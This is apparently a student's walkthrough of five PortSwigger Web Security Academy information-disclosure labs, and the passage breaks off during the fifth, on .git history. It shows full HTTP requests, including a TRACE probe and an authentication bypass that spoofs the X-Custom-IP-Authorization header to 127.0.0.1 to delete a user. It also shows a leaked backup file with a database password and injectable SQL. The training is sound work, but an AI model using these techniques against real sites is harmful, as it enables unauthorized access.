Information disclosure - Sensitive Data Exposure#

Pasted image 20251111022923.png

Information disclosure, also known as information leakage, is when a website unintentionally reveals sensitive information to its users.
Depending on the context, websites may leak all kinds of information to a potential attacker, including:
- Data about other users, such as usernames or financial information
- Sensitive commercial or business data
- Technical details about the website and its infrastructure

Lab 1 : Information disclosure in error message#

Pasted image 20251110221230.png

Pasted image 20251110233537.png

We just have to some how invoke error and it will reveal some error code along with some info,

1
https://0a3e00cf03a03559804026700079003d.web-security-academy.net/product?productId=1

Make productId=1 to productId=abc and we got version

Pasted image 20251110233709.png

Submit it and we solved the lab

Pasted image 20251110233742.png

Lab 2 : Information disclosure on debug page#

Pasted image 20251110233826.png

After accessing the index page we will see source code using view-source and what i find is that one interesting comment,
It is a path of PHPINFO page which has SECRET

1
<!-- <a href=/cgi-bin/phpinfo.php>Debug</a> -->

Pasted image 20251110234023.png

Pasted image 20251110234137.png

By submitting this key, we solve the lab.

1
wt30ohe9kx8idw7a8joy6f8er9yrzrqo

Pasted image 20251110234217.png

Lab 3 : Source code disclosure via backup files#

Pasted image 20251110234317.png

After accessing lab we will try to access the robots.txt and we find one entry,

Pasted image 20251110234438.png

In this directory we find another file which backup java file,
Which have database password indeed.

Pasted image 20251110234530.png

1
package data.productcatalog;
2

3
import common.db.JdbcConnectionBuilder;
4

5
import java.io.IOException;
6
import java.io.ObjectInputStream;
7
import java.io.Serializable;
8
import java.sql.Connection;
9
import java.sql.ResultSet;
10
import java.sql.SQLException;
11
import java.sql.Statement;
12

13
public class ProductTemplate implements Serializable
14
{
15
    static final long serialVersionUID = 1L;
16

17
    private final String id;
18
    private transient Product product;
19

20
    public ProductTemplate(String id)
21
    {
22
        this.id = id;
23
    }
24

25
    private void readObject(ObjectInputStream inputStream) throws IOException, ClassNotFoundException
26
    {
27
        inputStream.defaultReadObject();
28

29
        ConnectionBuilder connectionBuilder = ConnectionBuilder.from(
30
                "org.postgresql.Driver",
31
                "postgresql",
32
                "localhost",
33
                5432,
34
                "postgres",
35
                "postgres",
36
                "136c1aibxmmgd8lbzshi2pch3koui6u5"
37
        ).withAutoCommit();
38
        try
39
        {
40
            Connection connect = connectionBuilder.connect(30);
41
            String sql = String.format("SELECT * FROM products WHERE id = '%s' LIMIT 1", id);
42
            Statement statement = connect.createStatement();
43
            ResultSet resultSet = statement.executeQuery(sql);
44
            if (!resultSet.next())
45
            {
46
                return;
47
            }
48
            product = Product.from(resultSet);
49
        }
50
        catch (SQLException e)
51
        {
52
            throw new IOException(e);
53
        }
54
    }
55

56
    public String getId()
57
    {
58
        return id;
59
    }
60

61
    public Product getProduct()
62
    {
63
        return product;
64
    }
65
}

Here is the Database Password, and by submitting this we solve the lab

1
136c1aibxmmgd8lbzshi2pch3koui6u5

Pasted image 20251110234658.png

Lab 4 : Authentication bypass via information disclosure#

Pasted image 20251110234728.png

We have to login using given creds,
- wiener:peter

Pasted image 20251110234847.png

Now after this i tried to capture the /admin req and i got unauthorized,

Pasted image 20251110235322.png

So i tried use TRACE request (TRACE used for diagnostic purposes and it often harmless, but occasionally leads to the disclosure of sensitive information)
Request

1
TRACE /admin HTTP/1.1
2
Host: 0a9e006e04ba1e238121433e003b0082.web-security-academy.net
3
Connection: keep-alive
4
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
5
sec-ch-ua-mobile: ?0
6
sec-ch-ua-platform: "Windows"
7
Upgrade-Insecure-Requests: 1
8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
10
Sec-Fetch-Site: none
11
Sec-Fetch-Mode: navigate
12
Sec-Fetch-User: ?1
13
Sec-Fetch-Dest: document
14
Accept-Encoding: gzip, deflate, br, zstd
15
Accept-Language: en-US,en;q=0.9
16
Cookie: session=bN36B0fXMd5ziHba3JN6YQGKGU7TcXfP

Response

1
HTTP/1.1 200 OK
2
Content-Type: message/http
3
X-Frame-Options: SAMEORIGIN
4
Connection: close
5
Content-Length: 802
6

7
TRACE /admin HTTP/1.1
8
Host: 0a9e006e04ba1e238121433e003b0082.web-security-academy.net
9
Connection: close
10
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
11
sec-ch-ua-mobile: ?0
12
sec-ch-ua-platform: "Windows"
13
Upgrade-Insecure-Requests: 1
14
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
16
Sec-Fetch-Site: none
17
Sec-Fetch-Mode: navigate
18
Sec-Fetch-User: ?1
19
Sec-Fetch-Dest: document
20
Accept-Encoding: gzip, deflate, br, zstd
21
Accept-Language: en-US,en;q=0.9
22
Cookie: session=bN36B0fXMd5ziHba3JN6YQGKGU7TcXfP
23
X-Custom-IP-Authorization: 14.139.110.137

Pasted image 20251110235621.png

This is interesting header which leaks the information which tells that it is doing IP Based Authentication for admin access which can be bypass.

1
X-Custom-IP-Authorization: 14.139.110.137

We take this header and put it into our request and make the IP as 127.0.0.1 which means it will allow this host,

1
X-Custom-IP-Authorization: 127.0.0.1

Whole GET Request with above header,

1
GET /admin HTTP/1.1
2
Host: 0a9e006e04ba1e238121433e003b0082.web-security-academy.net
3
Connection: keep-alive
4
sec-ch-ua: "Chromium";v="142", "Google Chrome";v="142", "Not_A Brand";v="99"
5
sec-ch-ua-mobile: ?0
6
sec-ch-ua-platform: "Windows"
7
Upgrade-Insecure-Requests: 1
8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
10
Sec-Fetch-Site: none
11
Sec-Fetch-Mode: navigate
12
Sec-Fetch-User: ?1
13
Sec-Fetch-Dest: document
14
Accept-Encoding: gzip, deflate, br, zstd
15
Accept-Language: en-US,en;q=0.9
16
Cookie: session=bN36B0fXMd5ziHba3JN6YQGKGU7TcXfP
17
X-Custom-IP-Authorization: 127.0.0.1

Pasted image 20251111000043.png

We will just simple add this parameters to delete carlos user to solve lab,

1
GET /admin/delete?username=carlos

Pasted image 20251111000215.png

Pasted image 20251111000128.png

Lab 5 : Information disclosure in version control history#

Pasted image 20251111000314.png

Our aim is to gain password of administrator and delete the carlos user,
So i find for some sensitive directories and found one which is .git.

Pasted image 20251111020147.png

I found some data inside config file,

Pasted image 20251111020258.png

1
[core]
2
  repositoryformatversion = 0
3
  filemode = true
4
  bare = false
5
  logallrefupdates = true
6
[user]
7
  email = carlos@carlos-montoya.net
8
  name = Carlos Montoya